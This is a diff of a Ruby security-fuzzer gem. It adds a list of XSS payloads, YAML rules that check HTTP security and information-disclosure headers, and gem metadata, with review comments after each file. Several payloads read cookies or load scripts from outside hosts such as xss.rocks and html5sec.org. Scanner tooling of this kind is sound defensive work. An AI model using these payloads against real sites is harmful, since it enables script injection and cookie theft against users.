API_Fuzzer 0.1.1

@@ -0,0 +1,58 @@
1
+ ' onmouseover=alert(/Black.Spook/)
2
+ ";eval(unescape(location))//# %0Aalert(0)
3
+ "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
4
+ "><iframe%20src="http://google.com"%%203E
5
+ "><img src=x onerror=prompt(1);>
6
+ &lt;IMG """><SCRIPT>alert("XSS")</SCRIPT>">
7
+ &lt;SCRIPT SRC=//xss.rocks/.j>
8
+ '); alert('XSS
9
+ "><script>alert(1)</script>
10
+ \";alert('XSS');//
11
+ <%<!--'%><script>alert(1);</script -->
12
+ <%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74>
13
+ <--`<img/src=` onerror=alert(1)> --!>
14
+ <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
15
+ <<scr\0ipt/src=http://xss.com/xss.js></script
16
+ <<SCRIPT>alert("XSS");//<</SCRIPT>
17
+ <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>
18
+ <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
19
+ <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
20
+ <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
21
+ <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
22
+ <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
23
+ <a onmouseover="alert(document.cookie)">xxs link</a>
24
+ <a onmouseover=alert(document.cookie)>xxs link</a>
25
+ <iframe/onreadystatechange=alert(1)
26
+ <iframe/src \/\/onload = prompt(1)
27
+ <IMG DYNSRC=\"javascript:alert('XSS')\">
28
+ <IMG onmouseover="alert('xxs')">
29
+ <img src ?itworksonchrome?\/onerror = alert(1)???
30
+ <IMG SRC= onmouseover="alert('xxs')">
31
+ <IMG SRC=" &#14; javascript:alert('XSS');">
32
+ <img src="/" =_=" title="onerror='prompt(1)'">
33
+ <IMG SRC="jav&#x09;ascript:alert('XSS');">
34
+ <IMG SRC="jav&amp;#x09;ascript:alert('XSS');">
35
+ <IMG SRC="jav&amp;#x0A;ascript:alert('XSS');">
36
+ <IMG SRC="jav&amp;#x0D;ascript:alert('XSS');">
37
+ <IMG SRC="javascript:alert('XSS')"
38
+ <img src="javascript:alert('XSS')">
39
+ <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
40
+ <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
41
+ <img src=`xx:xx`onerror=alert(1)>
42
+ <svg contentScriptType=text/vbs><script>MsgBox+1
43
+ <svg/onload=alert(1)
44
+ <svg><script ?>alert(1)
45
+ <svg><script onlypossibleinopera:-)> alert(1)
46
+ <svg><script>//&NewLine;confirm(1);</script </svg>
47
+ <textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea>
48
+ <textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea>
49
+ <textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
50
+ <var onmouseover="prompt(1)">On Mouse Over</var>?
51
+ http://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
52
+ http://www.<script>alert(1)</script .com
53
+ https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
54
+ javascript:alert%28/xss/%29
55
+ javascript:alert(1)
56
+ PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
57
+ x”</title><img src%3dx onerror%3dalert(1)>
58
+ [[#%3Cscript%3Ealert(1)%3C/script%3E|
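Review bot: Several entries in this payload list point at hosts the tester does not control: `xss.rocks` (entry 7), `xss.com` (entry 15), the entity-encoded script source in entry 17, `html5sec.org` (entry 48) and the `raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/...` URLs at entries 51 and 53. If the application under test stores or reflects one of these, browsers rendering it fetch content from a third party whose ownership can change, so an authorised scan can leave a live external script reference behind. Replacing the hosts with a tester-controlled or reserved name such as `payload-host.example` (placeholder) keeps the detection value without that dependency. Entries 51 and 53 also end in `test.xxe` and track the mutable `master` branch, which looks like XXE fixture data rather than XSS input. If they are intended, a short header comment in the file saying so would help, assuming the loader skips comment lines.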
@@ -0,0 +1,17 @@
1
+ ---
2
+ rules:
3
+
4
+ -
5
+ description: X-XSS Protection Header is not set properly
6
+ name: x-xss-protection
7
+ match: \A[01](; mode=block)?(; report=.*)?\z
8
+
9
+ -
10
+ description: Possible Clickjacking Vulnerability
11
+ name: x-frame-options
12
+ match: \A(SAMEORIGIN\z|DENY\z)
13
+
14
+ -
15
+ description: HSTS protection is not enabled in service
16
+ name: strict-transport-security
17
+ match: \Amax-age=\d+(; includeSubdomains)?(; preload)?\z
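Review bot: The `strict-transport-security` pattern accepts `max-age=0`, which turns HSTS off, and it spells the directive `includeSubdomains`, so the common `includeSubDomains` spelling will be reported as a finding unless the loader compiles these patterns case-insensitively (not visible here). I would change it to `match: \Amax-age=[1-9]\d*(;\s*includeSubDomains)?(;\s*preload)?\z` and match case-insensitively, since header directives are case-insensitive and the space after `;` is optional. The same case question applies to `x-frame-options`, where a lower-case `sameorigin` or `deny` would be flagged. The `x-xss-protection` rule accepts `0`, which disables the filter; a comment above that rule stating whether this is intended would remove the apparent conflict with its description.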
@@ -0,0 +1,21 @@
1
+ ---
2
+ rules:
3
+
4
+ -
5
+ #Server
6
+ description: Information Disclosure of Server version
7
+ match: server
8
+ -
9
+ # Powered-by Header
10
+ description: Information Disclosure through x-powered-by
11
+ match: x-powered-by
12
+
13
+ -
14
+ # ASP.NET MVC version
15
+ description: Information Disclosure of APS.NET MVC version
16
+ match: x-aspnetmvc-version
17
+
18
+ -
19
+ # ASP.NET version
20
+ description: Information Disclosure of ASP.NET version
21
+ match: x-aspnet-version
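Review bot: The description for `x-aspnetmvc-version` misspells the product as `APS.NET`; it should read `description: Information Disclosure of ASP.NET MVC version`, since this string presumably ends up in the report. The `server` rule has no value pattern, so if `match` is compared only against the header name, a bare `Server` header with no version in it would still be reported as version disclosure. A one-line comment above that rule, for example `# presence of the header alone triggers this finding`, would set expectations for whoever triages the output.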
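--- a/metadata
+++ b/metadata
@@ -0,0 +1,163 @@
+ --- !ruby/object:Gem::Specification
+ name: API_Fuzzer
+ version: !ruby/object:Gem::Version
+ version: 0.1.1
+ platform: ruby
+ authors:
+ - Lalith Rallabhandi
+ autorequire:
+ bindir: exe
+ cert_chain: []
+ date: 2016-10-14 00:00:00.000000000 Z
+ dependencies:
+ - !ruby/object:Gem::Dependency
+ name: http
+ requirement: !ruby/object:Gem::Requirement
+ requirements:
+ - - ~>
+ - !ruby/object:Gem::Version
+ version: '2.0'
+ type: :runtime
+ prerelease: false
+ version_requirements: !ruby/object:Gem::Requirement
+ requirements:
+ - - ~>
+ - !ruby/object:Gem::Version
+ version: '2.0'
+ - !ruby/object:Gem::Dependency
+ name: activesupport
+ requirement: !ruby/object:Gem::Requirement
+ requirements:
+ - - '>='
+ - !ruby/object:Gem::Version
+ version: '0'
+ type: :runtime
+ prerelease: false
+ version_requirements: !ruby/object:Gem::Requirement
+ requirements:
+ - - '>='
+ - !ruby/object:Gem::Version
+ version: '0'
+ - !ruby/object:Gem::Dependency
+ name: rails
+ requirement: !ruby/object:Gem::Requirement
+ requirements:
+ - - '>='
+ - !ruby/object:Gem::Version
+ version: '4.2'
+ type: :runtime
+ prerelease: false
+ version_requirements: !ruby/object:Gem::Requirement
+ requirements:
+ - - '>='
+ - !ruby/object:Gem::Version
+ version: '4.2'
+ - !ruby/object:Gem::Dependency
+ name: bundler
+ requirement: !ruby/object:Gem::Requirement
+ requirements:
+ - - ~>
+ - !ruby/object:Gem::Version
+ version: '1.12'
+ type: :development
+ prerelease: false
+ version_requirements: !ruby/object:Gem::Requirement
+ requirements:
+ - - ~>
+ - !ruby/object:Gem::Version
+ version: '1.12'
+ - !ruby/object:Gem::Dependency
+ name: rake
+ requirement: !ruby/object:Gem::Requirement
+ requirements:
+ - - ~>
+ - !ruby/object:Gem::Version
+ version: '10.0'
+ type: :development
+ prerelease: false
+ version_requirements: !ruby/object:Gem::Requirement
+ requirements:
+ - - ~>
+ - !ruby/object:Gem::Version
+ version: '10.0'
+ - !ruby/object:Gem::Dependency
+ name: minitest
+ requirement: !ruby/object:Gem::Requirement
+ requirements:
+ - - ~>
+ - !ruby/object:Gem::Version
+ version: '5.0'
+ type: :development
+ prerelease: false
+ version_requirements: !ruby/object:Gem::Requirement
+ requirements:
+ - - ~>
+ - !ruby/object:Gem::Version
+ version: '5.0'
+ description: APIFuzzer gem builds api for finding security issues through a fuzzer
+ email:
+ - lalithr95@gmail.com
+ executables: []
+ extensions: []
+ extra_rdoc_files: []
+ files:
+ - .gitignore
+ - .travis.yml
+ - API_Fuzzer.gemspec
+ - CODE_OF_CONDUCT.md
+ - Gemfile
+ - LICENSE.txt
+ - README.md
+ - Rakefile
+ - app/controllers/ping_controller.rb
+ - bin/console
+ - bin/setup
+ - config/routes.rb
+ - lib/API_Fuzzer.rb
+ - lib/API_Fuzzer/csrf_check.rb
+ - lib/API_Fuzzer/engine.rb
+ - lib/API_Fuzzer/error.rb
+ - lib/API_Fuzzer/header_info.rb
+ - lib/API_Fuzzer/idor_check.rb
+ - lib/API_Fuzzer/privilege_escalation_check.rb
+ - lib/API_Fuzzer/rate_limit_check.rb
+ - lib/API_Fuzzer/redirect_check.rb
+ - lib/API_Fuzzer/request.rb
+ - lib/API_Fuzzer/resource_info.rb
+ - lib/API_Fuzzer/sql_blind_check.rb
+ - lib/API_Fuzzer/sql_check.rb
+ - lib/API_Fuzzer/version.rb
+ - lib/API_Fuzzer/vulnerability.rb
+ - lib/API_Fuzzer/xss_check.rb
+ - lib/API_Fuzzer/xxe_check.rb
+ - payloads/blind_sql.txt
+ - payloads/detect/sql.txt
+ - payloads/sql.txt
+ - payloads/xss.txt
+ - rules/headers.yml
+ - rules/info.yml
+ homepage: https://github.com/lalithr95/API-Fuzzer
+ licenses:
+ - MIT
+ metadata: {}
+ post_install_message:
+ rdoc_options: []
+ require_paths:
+ - lib
+ required_ruby_version: !ruby/object:Gem::Requirement
+ requirements:
+ - - '>='
+ - !ruby/object:Gem::Version
+ version: '0'
+ required_rubygems_version: !ruby/object:Gem::Requirement
+ requirements:
+ - - '>='
+ - !ruby/object:Gem::Version
+ version: '0'
+ requirements: []
+ rubyforge_project:
+ rubygems_version: 2.6.6
+ signing_key:
+ specification_version: 4
+ summary: APIFuzzer gem builds api for finding security issues through a fuzzer
+ test_files: []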